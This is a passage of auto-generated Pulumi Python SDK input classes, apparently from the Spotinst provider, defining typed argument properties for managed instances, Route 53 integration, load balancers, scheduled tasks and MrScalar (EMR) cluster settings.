@draining_timeout.setter
def draining_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout", value)
@property
@pulumi.getter(name="shouldDecrementTargetCapacity")
def should_decrement_target_capacity(self) -> Optional[pulumi.Input[bool]]:
"""
Decrementing the group target capacity after detaching the instances.
"""
return pulumi.get(self, "should_decrement_target_capacity")
@should_decrement_target_capacity.setter
def should_decrement_target_capacity(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_decrement_target_capacity", value)
@property
@pulumi.getter(name="shouldHandleAllBatches")
def should_handle_all_batches(self) -> Optional[pulumi.Input[bool]]:
"""
Indicator if the action should apply to all batches of the deployment or only the latest batch.
"""
return pulumi.get(self, "should_handle_all_batches")
@should_handle_all_batches.setter
def should_handle_all_batches(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_handle_all_batches", value)
@pulumi.input_type
class ManagedInstanceBlockDeviceMappingArgs:
def __init__(__self__, *,
device_name: pulumi.Input[str],
ebs: Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']] = None):
"""
:param pulumi.Input[str] device_name: The name of the device to mount.
:param pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs'] ebs: Object
"""
pulumi.set(__self__, "device_name", device_name)
if ebs is not None:
pulumi.set(__self__, "ebs", ebs)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> pulumi.Input[str]:
"""
The name of the device to mount.
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: pulumi.Input[str]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter
def ebs(self) -> Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']]:
"""
Object
"""
return pulumi.get(self, "ebs")
@ebs.setter
def ebs(self, value: Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']]):
pulumi.set(self, "ebs", value)
@pulumi.input_type
class ManagedInstanceBlockDeviceMappingEbsArgs:
def __init__(__self__, *,
delete_on_termination: Optional[pulumi.Input[bool]] = None,
iops: Optional[pulumi.Input[int]] = None,
throughput: Optional[pulumi.Input[int]] = None,
volume_size: Optional[pulumi.Input[int]] = None,
volume_type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[bool] delete_on_termination: Whether the volume should be destroyed on instance termination.
:param pulumi.Input[int] iops: The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
:param pulumi.Input[int] throughput: The throughput that the volume supports, in MiB/s. Minimum value of 125. Maximum value of 1000. Valid only if `volume_type` is set to `"gp3"`.
:param pulumi.Input[int] volume_size: The size of the volume, in GiBs.
:param pulumi.Input[str] volume_type: The type of volume. Can be `"standard"`, `"gp2"`, `"gp3"`, `"io1"`, `"st1"` or `"sc1"`.
"""
if delete_on_termination is not None:
pulumi.set(__self__, "delete_on_termination", delete_on_termination)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if volume_size is not None:
pulumi.set(__self__, "volume_size", volume_size)
if volume_type is not None:
pulumi.set(__self__, "volume_type", volume_type)
@property
@pulumi.getter(name="deleteOnTermination")
def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the volume should be destroyed on instance termination.
"""
return pulumi.get(self, "delete_on_termination")
@delete_on_termination.setter
def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_on_termination", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput that the volume supports, in MiB/s. Minimum value of 125. Maximum value of 1000. Valid only if `volume_type` is set to `"gp3"`.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="volumeSize")
def volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size of the volume, in GiBs.
"""
return pulumi.get(self, "volume_size")
@volume_size.setter
def volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volume_size", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of volume. Can be `"standard"`, `"gp2"`, `"gp3"`, `"io1"`, `"st1"` or `"sc1"`.
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "volume_type", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53Args:
def __init__(__self__, *,
domains: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]):
"""
:param pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]] domains: Route 53 Domain configurations.
"""
pulumi.set(__self__, "domains", domains)
@property
@pulumi.getter
def domains(self) -> pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]:
"""
Route 53 Domain configurations.
"""
return pulumi.get(self, "domains")
@domains.setter
def domains(self, value: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]):
pulumi.set(self, "domains", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53DomainArgs:
def __init__(__self__, *,
hosted_zone_id: pulumi.Input[str],
record_sets: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]],
record_set_type: Optional[pulumi.Input[str]] = None,
spotinst_acct_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] hosted_zone_id: The Route 53 Hosted Zone Id for the registered Domain.
:param pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]] record_sets: List of record sets
:param pulumi.Input[str] record_set_type: The type of the record set. Valid values: `"a"`, `"cname"`.
:param pulumi.Input[str] spotinst_acct_id: The Spotinst account ID that is linked to the AWS account that holds the Route 53 hosted Zone Id. The default is the user Spotinst account provided as a URL parameter.
"""
pulumi.set(__self__, "hosted_zone_id", hosted_zone_id)
pulumi.set(__self__, "record_sets", record_sets)
if record_set_type is not None:
pulumi.set(__self__, "record_set_type", record_set_type)
if spotinst_acct_id is not None:
pulumi.set(__self__, "spotinst_acct_id", spotinst_acct_id)
@property
@pulumi.getter(name="hostedZoneId")
def hosted_zone_id(self) -> pulumi.Input[str]:
"""
The Route 53 Hosted Zone Id for the registered Domain.
"""
return pulumi.get(self, "hosted_zone_id")
@hosted_zone_id.setter
def hosted_zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "hosted_zone_id", value)
@property
@pulumi.getter(name="recordSets")
def record_sets(self) -> pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]]:
"""
List of record sets
"""
return pulumi.get(self, "record_sets")
@record_sets.setter
def record_sets(self, value: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]]):
pulumi.set(self, "record_sets", value)
@property
@pulumi.getter(name="recordSetType")
def record_set_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the record set. Valid values: `"a"`, `"cname"`.
"""
return pulumi.get(self, "record_set_type")
@record_set_type.setter
def record_set_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "record_set_type", value)
@property
@pulumi.getter(name="spotinstAcctId")
def spotinst_acct_id(self) -> Optional[pulumi.Input[str]]:
"""
The Spotinst account ID that is linked to the AWS account that holds the Route 53 hosted Zone Id. The default is the user Spotinst account provided as a URL parameter.
"""
return pulumi.get(self, "spotinst_acct_id")
@spotinst_acct_id.setter
def spotinst_acct_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spotinst_acct_id", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53DomainRecordSetArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
use_public_dns: Optional[pulumi.Input[bool]] = None,
use_public_ip: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[bool] use_public_dns: - Designates whether the DNS address should be exposed to connections outside the VPC.
:param pulumi.Input[bool] use_public_ip: - Designates whether the IP address should be exposed to connections outside the VPC.
"""
pulumi.set(__self__, "name", name)
if use_public_dns is not None:
pulumi.set(__self__, "use_public_dns", use_public_dns)
if use_public_ip is not None:
pulumi.set(__self__, "use_public_ip", use_public_ip)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="usePublicDns")
def use_public_dns(self) -> Optional[pulumi.Input[bool]]:
"""
- Designates whether the DNS address should be exposed to connections outside the VPC.
"""
return pulumi.get(self, "use_public_dns")
@use_public_dns.setter
def use_public_dns(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_public_dns", value)
@property
@pulumi.getter(name="usePublicIp")
def use_public_ip(self) -> Optional[pulumi.Input[bool]]:
"""
- Designates whether the IP address should be exposed to connections outside the VPC.
"""
return pulumi.get(self, "use_public_ip")
@use_public_ip.setter
def use_public_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_public_ip", value)
@pulumi.input_type
class ManagedInstanceLoadBalancerArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
arn: Optional[pulumi.Input[str]] = None,
auto_weight: Optional[pulumi.Input[bool]] = None,
az_awareness: Optional[pulumi.Input[bool]] = None,
balancer_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
target_set_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`.
:param pulumi.Input[str] arn: The AWS resource ARN (Required only for ALB target groups).
:param pulumi.Input[bool] auto_weight: "Auto Weight" will automatically provide a higher weight for instances that are larger as appropriate. For example, if you have configured your Elastigroup with m4.large and m4.xlarge instances the m4.large will have half the weight of an m4.xlarge. This ensures that larger instances receive a higher number of MLB requests.
:param pulumi.Input[bool] az_awareness: "AZ Awareness" will ensure that instances within the same AZ are using the corresponding MLB runtime instance in the same AZ. This feature reduces multi-zone data transfer fees.
:param pulumi.Input[str] balancer_id: The Multai load balancer ID. Example: lb-123456
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] target_set_id: The Multai load target set ID. Example: ts-123456
"""
pulumi.set(__self__, "type", type)
if arn is not None:
pulumi.set(__self__, "arn", arn)
if auto_weight is not None:
pulumi.set(__self__, "auto_weight", auto_weight)
if az_awareness is not None:
pulumi.set(__self__, "az_awareness", az_awareness)
if balancer_id is not None:
pulumi.set(__self__, "balancer_id", balancer_id)
if name is not None:
pulumi.set(__self__, "name", name)
if target_set_id is not None:
pulumi.set(__self__, "target_set_id", target_set_id)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The AWS resource ARN (Required only for ALB target groups).
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="autoWeight")
def auto_weight(self) -> Optional[pulumi.Input[bool]]:
"""
"Auto Weight" will automatically provide a higher weight for instances that are larger as appropriate. For example, if you have configured your Elastigroup with m4.large and m4.xlarge instances the m4.large will have half the weight of an m4.xlarge. This ensures that larger instances receive a higher number of MLB requests.
"""
return pulumi.get(self, "auto_weight")
@auto_weight.setter
def auto_weight(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_weight", value)
@property
@pulumi.getter(name="azAwareness")
def az_awareness(self) -> Optional[pulumi.Input[bool]]:
"""
"AZ Awareness" will ensure that instances within the same AZ are using the corresponding MLB runtime instance in the same AZ. This feature reduces multi-zone data transfer fees.
"""
return pulumi.get(self, "az_awareness")
@az_awareness.setter
def az_awareness(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "az_awareness", value)
@property
@pulumi.getter(name="balancerId")
def balancer_id(self) -> Optional[pulumi.Input[str]]:
"""
The Multai load balancer ID. Example: lb-123456
"""
return pulumi.get(self, "balancer_id")
@balancer_id.setter
def balancer_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "balancer_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetSetId")
def target_set_id(self) -> Optional[pulumi.Input[str]]:
"""
The Multai load target set ID. Example: ts-123456
"""
return pulumi.get(self, "target_set_id")
@target_set_id.setter
def target_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_set_id", value)
@pulumi.input_type
class ManagedInstanceManagedInstanceActionArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
"""
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`.
"""
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedInstanceNetworkInterfaceArgs:
def __init__(__self__, *,
device_index: pulumi.Input[str],
associate_ipv6_address: Optional[pulumi.Input[bool]] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] device_index: The position of the network interface in the attachment order. A primary network interface has a device index of 0. If you specify a network interface when launching an instance, you must specify the device index.
:param pulumi.Input[bool] associate_ipv6_address: Indicates whether to assign an IPv6 address. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. Default: `false`
:param pulumi.Input[bool] associate_public_ip_address: Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is true.
"""
pulumi.set(__self__, "device_index", device_index)
if associate_ipv6_address is not None:
pulumi.set(__self__, "associate_ipv6_address", associate_ipv6_address)
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
@property
@pulumi.getter(name="deviceIndex")
def device_index(self) -> pulumi.Input[str]:
"""
The position of the network interface in the attachment order. A primary network interface has a device index of 0. If you specify a network interface when launching an instance, you must specify the device index.
"""
return pulumi.get(self, "device_index")
@device_index.setter
def device_index(self, value: pulumi.Input[str]):
pulumi.set(self, "device_index", value)
@property
@pulumi.getter(name="associateIpv6Address")
def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether to assign an IPv6 address. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. Default: `false`
"""
return pulumi.get(self, "associate_ipv6_address")
@associate_ipv6_address.setter
def associate_ipv6_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_ipv6_address", value)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is true.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@pulumi.input_type
class ManagedInstanceResourceTagSpecificationArgs:
def __init__(__self__, *,
should_tag_amis: Optional[pulumi.Input[bool]] = None,
should_tag_enis: Optional[pulumi.Input[bool]] = None,
should_tag_snapshots: Optional[pulumi.Input[bool]] = None,
should_tag_volumes: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] should_tag_amis: Tag specification for AMI resources.
:param pulumi.Input[bool] should_tag_enis: Tag specification for ENI resources.
:param pulumi.Input[bool] should_tag_snapshots: Tag specification for Snapshot resources.
:param pulumi.Input[bool] should_tag_volumes: Tag specification for Volume resources.
"""
if should_tag_amis is not None:
pulumi.set(__self__, "should_tag_amis", should_tag_amis)
if should_tag_enis is not None:
pulumi.set(__self__, "should_tag_enis", should_tag_enis)
if should_tag_snapshots is not None:
pulumi.set(__self__, "should_tag_snapshots", should_tag_snapshots)
if should_tag_volumes is not None:
pulumi.set(__self__, "should_tag_volumes", should_tag_volumes)
@property
@pulumi.getter(name="shouldTagAmis")
def should_tag_amis(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for AMI resources.
"""
return pulumi.get(self, "should_tag_amis")
@should_tag_amis.setter
def should_tag_amis(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_amis", value)
@property
@pulumi.getter(name="shouldTagEnis")
def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for ENI resources.
"""
return pulumi.get(self, "should_tag_enis")
@should_tag_enis.setter
def should_tag_enis(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_enis", value)
@property
@pulumi.getter(name="shouldTagSnapshots")
def should_tag_snapshots(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for Snapshot resources.
"""
return pulumi.get(self, "should_tag_snapshots")
@should_tag_snapshots.setter
def should_tag_snapshots(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_snapshots", value)
@property
@pulumi.getter(name="shouldTagVolumes")
def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for Volume resources.
"""
return pulumi.get(self, "should_tag_volumes")
@should_tag_volumes.setter
def should_tag_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_volumes", value)
@pulumi.input_type
class ManagedInstanceRevertToSpotArgs:
def __init__(__self__, *,
perform_at: pulumi.Input[str]):
"""
:param pulumi.Input[str] perform_at: Valid values: `"always"`, `"never"`, `"timeWindow"`. Default `"never"`.
"""
pulumi.set(__self__, "perform_at", perform_at)
@property
@pulumi.getter(name="performAt")
def perform_at(self) -> pulumi.Input[str]:
"""
Valid values: `"always"`, `"never"`, `"timeWindow"`. Default `"never"`.
"""
return pulumi.get(self, "perform_at")
@perform_at.setter
def perform_at(self, value: pulumi.Input[str]):
pulumi.set(self, "perform_at", value)
@pulumi.input_type
class ManagedInstanceScheduledTaskArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
cron_expression: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
start_time: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] task_type: The task type to run. Valid values: `"pause"`, `"resume"`, `"recycle"`.
:param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of ‘frequency’ or ‘cronExpression’ should be used at a time.
Example: `"0 1 * * *"`.
:param pulumi.Input[str] frequency: Set frequency for the task. Valid values: "hourly", "daily", "weekly", "continuous".
:param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run.
:param pulumi.Input[str] start_time: DATETIME in ISO-8601 format. Sets a start time for scheduled actions. If "frequency" or "cronExpression" are not used - the task will run only once at the start time and will then be deleted from the instance configuration.
Example: `"2019-05-23T10:55:09Z"`
"""
pulumi.set(__self__, "task_type", task_type)
if cron_expression is not None:
pulumi.set(__self__, "cron_expression", cron_expression)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
The task type to run. Valid values: `"pause"`, `"resume"`, `"recycle"`.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter(name="cronExpression")
def cron_expression(self) -> Optional[pulumi.Input[str]]:
"""
A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of ‘frequency’ or ‘cronExpression’ should be used at a time.
Example: `"0 1 * * *"`.
"""
return pulumi.get(self, "cron_expression")
@cron_expression.setter
def cron_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cron_expression", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[str]]:
"""
Set frequency for the task. Valid values: "hourly", "daily", "weekly", "continuous".
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Describes whether the task is enabled. When true the task should run when false it should not run.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
DATETIME in ISO-8601 format. Sets a start time for scheduled actions. If "frequency" or "cronExpression" are not used - the task will run only once at the start time and will then be deleted from the instance configuration.
Example: `"2019-05-23T10:55:09Z"`
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@pulumi.input_type
class ManagedInstanceTagArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] key: Tag's key.
:param pulumi.Input[str] value: Tag's name.
"""
if key is not None:
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Tag's key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Tag's name.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class MrScalarApplicationArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
args: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[Sequence[pulumi.Input[str]]] args: Arguments for EMR to pass to the application.
:param pulumi.Input[str] version: T he version of the application.
"""
pulumi.set(__self__, "name", name)
if args is not None:
pulumi.set(__self__, "args", args)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def args(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Arguments for EMR to pass to the application.
"""
return pulumi.get(self, "args")
@args.setter
def args(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "args", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
T he version of the application.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class MrScalarBootstrapActionsFileArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str]):
"""
:param pulumi.Input[str] bucket: S3 Bucket name for bootstrap actions.
:param pulumi.Input[str] key: S3 key for bootstrap actions.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
S3 Bucket name for bootstrap actions.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
S3 key for bootstrap actions.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarConfigurationsFileArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str]):
"""
:param pulumi.Input[str] bucket: S3 Bucket name for bootstrap actions.
:param pulumi.Input[str] key: S3 key for bootstrap actions.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
S3 Bucket name for bootstrap actions.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
S3 key for bootstrap actions.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarCoreEbsBlockDeviceArgs:
def __init__(__self__, *,
size_in_gb: pulumi.Input[int],
volume_type: pulumi.Input[str],
iops: Optional[pulumi.Input[int]] = None,
volumes_per_instance: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
:param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
:param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
:param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the master group.
"""
pulumi.set(__self__, "size_in_gb", size_in_gb)
pulumi.set(__self__, "volume_type", volume_type)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if volumes_per_instance is not None:
pulumi.set(__self__, "volumes_per_instance", volumes_per_instance)
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> pulumi.Input[int]:
"""
Size of the volume, in GBs.
"""
return pulumi.get(self, "size_in_gb")
@size_in_gb.setter
def size_in_gb(self, value: pulumi.Input[int]):
pulumi.set(self, "size_in_gb", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> pulumi.Input[str]:
"""
volume type. Allowed values are 'gp2', 'io1' and others.
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: pulumi.Input[str]):
pulumi.set(self, "volume_type", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
IOPS for the volume. Required in some volume types, such as io1.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter(name="volumesPerInstance")
def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
"""
Amount of volumes per instance in the master group.
"""
return pulumi.get(self, "volumes_per_instance")
@volumes_per_instance.setter
def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarCoreScalingDownPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
